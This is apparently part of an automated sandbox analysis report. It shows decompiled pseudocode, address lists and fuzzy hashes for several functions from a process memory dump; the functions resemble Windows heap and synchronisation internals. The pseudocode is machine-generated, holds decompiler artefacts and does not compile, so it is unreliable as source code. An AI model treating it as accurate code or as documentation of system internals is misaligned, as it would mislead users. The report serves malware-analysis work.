                                                      Function 0493E730, Relevance: .1, Instructions: 89COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 74%
                                                      			E0493E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E04949670() < 0) {
					L0495DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x49f7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L04924620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M0493E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                                      0x0493e730
                                                      0x0493e736
                                                      0x0493e738
                                                      0x0493e73d
                                                      0x0493e73e
                                                      0x0493e740
                                                      0x0493e749
                                                      0x0493e765
                                                      0x0493e76a
                                                      0x0493e76b
                                                      0x0493e76c
                                                      0x0493e76d
                                                      0x0493e76e
                                                      0x0493e76f
                                                      0x0493e775
                                                      0x0493e777
                                                      0x0493e77e
                                                      0x0497b675
                                                      0x0493e784
                                                      0x0493e784
                                                      0x0493e789
                                                      0x0493e7a8
                                                      0x0493e7ac
                                                      0x0493e807
                                                      0x0493e7ae
                                                      0x0493e7ae
                                                      0x0493e7b1
                                                      0x0493e7b4
                                                      0x0493e7b9
                                                      0x0493e7c0
                                                      0x0493e7c4
                                                      0x0493e7ca
                                                      0x0493e7cc
                                                      0x00000000
                                                      0x0493e7d3
                                                      0x0493e7d6
                                                      0x00000000
                                                      0x00000000
                                                      0x0493e7ff
                                                      0x0493e802
                                                      0x00000000
                                                      0x00000000
                                                      0x0493e7f9
                                                      0x0493e7fc
                                                      0x00000000
                                                      0x00000000
                                                      0x0493e7f3
                                                      0x0493e7f6
                                                      0x00000000
                                                      0x00000000
                                                      0x0493e7ed
                                                      0x0493e7f0
                                                      0x00000000
                                                      0x00000000
                                                      0x0493e7e7
                                                      0x0493e7ea
                                                      0x00000000
                                                      0x00000000
                                                      0x0497b685
                                                      0x0497b688
                                                      0x00000000
                                                      0x00000000
                                                      0x0497b682
                                                      0x00000000
                                                      0x00000000
                                                      0x0493e7cc
                                                      0x0493e7d9
                                                      0x0493e7dc
                                                      0x0493e7de
                                                      0x0493e7de
                                                      0x0493e7ac
                                                      0x0493e7e4
                                                      0x0493e74b
                                                      0x0493e751
                                                      0x0493e759
                                                      0x0493e761
                                                      0x0493e761

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 640cff57dc86b61eb6b20e294df2e024537079fd75983cf5116807aebe8f7e42
                                                      • Instruction ID: 6933c53668a1a3942623ed4496f0bd308a85dffbfbe9408dd8c65de2e53e00de
                                                      • Opcode Fuzzy Hash: 640cff57dc86b61eb6b20e294df2e024537079fd75983cf5116807aebe8f7e42
                                                      • Instruction Fuzzy Hash: C6315C75A14249AFDB44CF68D841B9ABBE8FB59314F148666F904CB341E631ED80CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0493BC2C, Relevance: .1, Instructions: 88COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 67%
                                                      			E0493BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x49f6100; // 0x37
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E04922280(0xd, 0x171cf1a0);
				_t41 =  *0x49f60f8; // 0x0
				if(_t41 != 0) {
					 *0x49f60f8 =  *_t41;
					 *0x49f60fc =  *0x49f60fc + 0xffff;
				}
				E0491FFB0(_t41, 0x800, 0x171cf1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x49f60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L04924620(0x49f6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x49f6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                                      0x0493bc36
                                                      0x0493bc42
                                                      0x0493bc45
                                                      0x0493bc4a
                                                      0x0493bd35
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0493bc50
                                                      0x0493bc50
                                                      0x0493bc58
                                                      0x0493bc5a
                                                      0x0493bc60
                                                      0x00000000
                                                      0x00000000
                                                      0x0497a4f2
                                                      0x0497a4f6
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0497a4fc
                                                      0x0493bc79
                                                      0x0493bc7e
                                                      0x0493bc86
                                                      0x0493bd16
                                                      0x0493bd20
                                                      0x0493bd20
                                                      0x0493bc8d
                                                      0x0493bc94
                                                      0x0493bcbd
                                                      0x0493bcca
                                                      0x0493bccb
                                                      0x0493bccc
                                                      0x0493bccd
                                                      0x0493bcce
                                                      0x0493bcd4
                                                      0x0493bcea
                                                      0x0493bcee
                                                      0x0493bcf2
                                                      0x0493bd00
                                                      0x0493bd04
                                                      0x00000000
                                                      0x0493bc96
                                                      0x0493bcab
                                                      0x0493bcaf
                                                      0x0493bd2c
                                                      0x0493bd2c
                                                      0x0493bd09
                                                      0x00000000
                                                      0x0493bd09
                                                      0x0493bcb1
                                                      0x0493bcb5
                                                      0x0493bcbb
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0493bcbb

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b7cb9d17590f6901460061a6a216600b57a8f68367054db1bd18bf117b5ea93a
                                                      • Instruction ID: f74a75eb16e32e5eb153f556b003298d3e0f106a6fd7d8def1048df39dd5c0bf
                                                      • Opcode Fuzzy Hash: b7cb9d17590f6901460061a6a216600b57a8f68367054db1bd18bf117b5ea93a
                                                      • Instruction Fuzzy Hash: 803101726047159BDB11DF58C480BA677B4EB09316F140479ED18DB206E779FD06CB80
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04931DB5, Relevance: .1, Instructions: 87COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 60%
                                                      			E04931DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E0492F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L04924620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E0492F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                                      0x04931dc2
                                                      0x04931dc5
                                                      0x04931dc7
                                                      0x04931dcc
                                                      0x04931dce
                                                      0x04931dd6
                                                      0x04931ddf
                                                      0x04931de0
                                                      0x04931de1
                                                      0x04931de5
                                                      0x04931de8
                                                      0x04931def
                                                      0x04931df0
                                                      0x04931df6
                                                      0x04931df7
                                                      0x04931dfe
                                                      0x04931e1a
                                                      0x00000000
                                                      0x00000000
                                                      0x04931e0b
                                                      0x04931e12
                                                      0x04931e12
                                                      0x04931e00
                                                      0x04931e00
                                                      0x04931e05
                                                      0x04931e1e
                                                      0x04931e23
                                                      0x0497570f
                                                      0x04975713
                                                      0x00000000
                                                      0x00000000
                                                      0x04975719
                                                      0x04975719
                                                      0x04931e2c
                                                      0x04931e2d
                                                      0x04931e2e
                                                      0x04931e2f
                                                      0x04931e31
                                                      0x04931e32
                                                      0x04931e35
                                                      0x04931e3d
                                                      0x04975723
                                                      0x0497573d
                                                      0x0497573d
                                                      0x00000000
                                                      0x04975723
                                                      0x04931e49
                                                      0x04931e4e
                                                      0x04931e4e
                                                      0x04931e09
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                      • Instruction ID: 414acea05b12f22c1feb79e3107c8e0713a2ab0ae5b9fecf3fab9f6c0490b3ba
                                                      • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                      • Instruction Fuzzy Hash: 51219F32600518FFD720CF99CD85EAABBBDEF86755F114075E90197220DA31BE01DBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04909100, Relevance: .1, Instructions: 87COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 76%
                                                      			E04909100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x49df6e8);
				E0495D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E049D88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0495D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x49f86c0; // 0xc607b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x49f86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E04922280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E049D88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0494AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x49fb1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x49f84c0;
										if(_t69 >=  *0x49f84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E049D9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E0490922A(_t82);
							_t53 = E04927D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E049D8B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x49f86c0; // 0xc607b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x49f86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x49f86bc;
										_t72 = 0x49f86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E04909240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x49f86c4;
									_t72 = 0x49f86c0;
									L18:
									E04939B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                                      0x04909100
                                                      0x04909100
                                                      0x04909100
                                                      0x04909100
                                                      0x04909102
                                                      0x04909107
                                                      0x0490910c
                                                      0x04909110
                                                      0x04909115
                                                      0x04909136
                                                      0x04909143
                                                      0x049637e4
                                                      0x049637e4
                                                      0x04909149
                                                      0x0490914e
                                                      0x0490914e
                                                      0x04909117
                                                      0x0490911d
                                                      0x00000000
                                                      0x00000000
                                                      0x0490911f
                                                      0x04909125
                                                      0x00000000
                                                      0x04909151
                                                      0x04909158
                                                      0x0490915d
                                                      0x04909161
                                                      0x04909168
                                                      0x04963715
                                                      0x00000000
                                                      0x0490916e
                                                      0x0490916e
                                                      0x04909175
                                                      0x04909177
                                                      0x0490917e
                                                      0x0490917f
                                                      0x04909182
                                                      0x04909182
                                                      0x04909187
                                                      0x04909187
                                                      0x0490918a
                                                      0x0490918d
                                                      0x0490918f
                                                      0x04909192
                                                      0x04909195
                                                      0x04909198
                                                      0x04909198
                                                      0x04909198
                                                      0x0490919a
                                                      0x00000000
                                                      0x00000000
                                                      0x0496371f
                                                      0x04963721
                                                      0x04963727
                                                      0x0496372f
                                                      0x04963733
                                                      0x04963735
                                                      0x04963738
                                                      0x0496373b
                                                      0x0496373d
                                                      0x04963740
                                                      0x00000000
                                                      0x00000000
                                                      0x04963746
                                                      0x04963749
                                                      0x00000000
                                                      0x00000000
                                                      0x0496374f
                                                      0x04963751
                                                      0x00000000
                                                      0x00000000
                                                      0x04963757
                                                      0x04963759
                                                      0x0496375c
                                                      0x0496375c
                                                      0x0496375e
                                                      0x0496375e
                                                      0x04963761
                                                      0x04963764
                                                      0x00000000
                                                      0x00000000
                                                      0x04963766
                                                      0x04963768
                                                      0x049637a3
                                                      0x049637a3
                                                      0x049637a5
                                                      0x049637a7
                                                      0x049637ad
                                                      0x049637b0
                                                      0x049637b2
                                                      0x049637bc
                                                      0x049637c2
                                                      0x049637c2
                                                      0x049637b2
                                                      0x04909187
                                                      0x04909187
                                                      0x0490918a
                                                      0x0490918d
                                                      0x0490918f
                                                      0x04909192
                                                      0x04909195
                                                      0x00000000
                                                      0x04909195
                                                      0x00000000
                                                      0x04909187
                                                      0x0496376a
                                                      0x0496376a
                                                      0x0496376c
                                                      0x0496376c
                                                      0x0496376f
                                                      0x04963775
                                                      0x00000000
                                                      0x00000000
                                                      0x04963777
                                                      0x04963779
                                                      0x00000000
                                                      0x00000000
                                                      0x04963782
                                                      0x04963787
                                                      0x04963789
                                                      0x04963790
                                                      0x04963790
                                                      0x0496378b
                                                      0x0496378b
                                                      0x0496378b
                                                      0x04963792
                                                      0x04963795
                                                      0x04963795
                                                      0x04963798
                                                      0x04963798
                                                      0x0496379b
                                                      0x0496379b
                                                      0x049091a3
                                                      0x049091a9
                                                      0x049091b0
                                                      0x049091b4
                                                      0x049091b4
                                                      0x049091bb
                                                      0x049091c0
                                                      0x049091c5
                                                      0x049091c7
                                                      0x049637da
                                                      0x049091cd
                                                      0x049091cd
                                                      0x049091cd
                                                      0x049091d2
                                                      0x049091d5
                                                      0x04909239
                                                      0x04909239
                                                      0x049091d7
                                                      0x049091db
                                                      0x049091e1
                                                      0x049091e7
                                                      0x049091fd
                                                      0x04909203
                                                      0x0490921e
                                                      0x04909223
                                                      0x00000000
                                                      0x04909223
                                                      0x04909205
                                                      0x04909208
                                                      0x0490920c
                                                      0x04909214
                                                      0x04909214
                                                      0x049091e9
                                                      0x049091e9
                                                      0x049091ee
                                                      0x049091f3
                                                      0x049091f3
                                                      0x049091f3
                                                      0x049091e7
                                                      0x00000000
                                                      0x049091db
                                                      0x04909187
                                                      0x04909168

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2e39b5de27471260d0f4476330bef4b3890a3e7a1cc1a3ae1c9095b9ec0f1cb0
                                                      • Instruction ID: 231953e41d76730f95f6e9a5bf80e5c04a9623795135ff2f2750d453b13cfcea
                                                      • Opcode Fuzzy Hash: 2e39b5de27471260d0f4476330bef4b3890a3e7a1cc1a3ae1c9095b9ec0f1cb0
                                                      • Instruction Fuzzy Hash: 2231D2B1B05644DFEB65EF68C488BACBBF5BB89314F18C579C41567282C334B980CB51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04920050, Relevance: .1, Instructions: 81COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 53%
                                                      			E04920050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x49fd360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E04939ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0494B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E049D8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E04939702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x49fb1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                                      0x04920055
                                                      0x0492005d
                                                      0x04920062
                                                      0x0492006c
                                                      0x0492006f
                                                      0x04920074
                                                      0x0492007a
                                                      0x0492007a
                                                      0x04920080
                                                      0x04920080
                                                      0x04920087
                                                      0x0492008d
                                                      0x0492008f
                                                      0x04920093
                                                      0x04920095
                                                      0x0492009b
                                                      0x049200f8
                                                      0x049200fb
                                                      0x049200fc
                                                      0x049200ff
                                                      0x04920108
                                                      0x04920108
                                                      0x049200a2
                                                      0x049200a6
                                                      0x049200b3
                                                      0x049200bc
                                                      0x049200c5
                                                      0x049200ca
                                                      0x0496c01e
                                                      0x00000000
                                                      0x00000000
                                                      0x0496c02d
                                                      0x049200d5
                                                      0x049200d9
                                                      0x0496c03d
                                                      0x0496c046
                                                      0x0496c046
                                                      0x049200df
                                                      0x049200e2
                                                      0x049200ea
                                                      0x049200ef
                                                      0x049200f2
                                                      0x049200f6
                                                      0x04920111
                                                      0x04920117
                                                      0x04920117
                                                      0x00000000
                                                      0x049200f6
                                                      0x049200d0
                                                      0x049200d0
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c0ba0583d57838f27a0b2af8409bac3a2f81cc9a9da7cbf0088e81811022930c
                                                      • Instruction ID: 7d1fb29b966667794ce2afda0e9e90f285ec314a3c3eeac378ad9a3234e443ed
                                                      • Opcode Fuzzy Hash: c0ba0583d57838f27a0b2af8409bac3a2f81cc9a9da7cbf0088e81811022930c
                                                      • Instruction Fuzzy Hash: DE319C31241A048FE721CF28C944B56B3E5FF89718F144579E59687A94EA75B801CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04986C0A, Relevance: .1, Instructions: 79COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 77%
                                                      			E04986C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E04927D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x49f7b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L04924620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0494F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E04927D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E04949AE0();
						_t23 = L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                                      0x04986c0a
                                                      0x04986c0f
                                                      0x04986c10
                                                      0x04986c13
                                                      0x04986c15
                                                      0x04986c19
                                                      0x04986c1c
                                                      0x04986c21
                                                      0x04986c28
                                                      0x04986c3a
                                                      0x04986c2a
                                                      0x04986c33
                                                      0x04986c33
                                                      0x04986c3f
                                                      0x04986c48
